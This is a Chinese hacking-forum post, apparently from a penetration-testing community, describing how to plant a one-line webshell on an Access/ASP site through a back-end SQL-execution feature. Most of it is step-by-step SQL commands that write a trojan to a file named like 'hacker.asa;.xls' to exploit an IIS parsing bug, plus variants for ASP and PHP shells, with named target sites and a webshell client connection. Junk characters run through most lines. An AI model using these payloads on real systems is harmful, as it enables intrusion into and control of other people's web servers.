中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
' z% i0 e2 _3 a" r# K9 Q8 ~webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
" Q: D' w# P7 ]. v% \) w1 e文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了," M+ k* p' t# P  O% X8 P
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:! q, D! @% w8 N/ Y! E
1.create table cmd (a varchar(50))5 D* F8 j- F" F9 p5 b
2.insert into cmd (a) values (‘‘)
  M0 l, K9 k/ O0 w) }' s3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd( w0 D% v5 l, `/ o9 ?- \
(把表cmd的内容导出为物理路径的一个EXCEL文件)2 j7 h8 m8 ]0 Z% ^$ ?, h, N
4.drop table cmd
. f0 a* S. u7 Z3 U$ N" E# e  }' d: \利用IIS的BUG成功拿到了WEBSHELL。
6 c0 q; y3 P, o$ Q% }* v; f& T# M7 n! }& ~' T8 P' y6 D
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话  ?8 P8 Z; O4 w3 a0 K  p

4 s5 W" G2 ?0 k! ~7 h2 J  SQL语句意思解释:
7 l# k) D* M6 E% ~; b8 [  h  第一句
) C, `( f/ _' D. V9 s) M( A4 |  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
' M& g0 r2 v) a. T; K' q
* _+ u9 H2 c5 B  第二句
6 F) y" t+ L" n3 u( A- j0 D! P  在表cmd的a字段插入一句话木马
+ f- _/ H1 S; G1 _% N  第三句
$ c7 `+ {0 f0 ]/ @5 y& G  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
& r# R# G, t! I8 e$ x3 h1 X( [3 ^, d3 `0 j4 W1 U
  第四句: P) \! u1 T$ @% {' u( U
  删除建立的cmd表1 S) y9 {) q2 p* g, g! J! v0 N

0 D4 m" C! B* w9 }1 b0 }7 S  以下内容为测试:1 _& T( X, S/ k& T5 ?
  Access利用后台SQL执行命令功能导出WebShell:# z1 N6 E( I) V( `
  这个更简单:4 A; A; p3 l5 E* ?. ^& o" c- O
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]1 }+ M% P- \# Y, T' k
  或者
' \  V' k3 U( s) E- \  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]( C2 I7 y, \: f% [8 c8 K; J

. K2 }7 F  y% f% z' E  后台有执行SQL语句功能(vote为已知表段)
; R; M  `+ L- x3 R: Q  希望对大家有所帮助拿shell的又一个思路
. B" N, g4 c! c9 X% B% N2 n




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2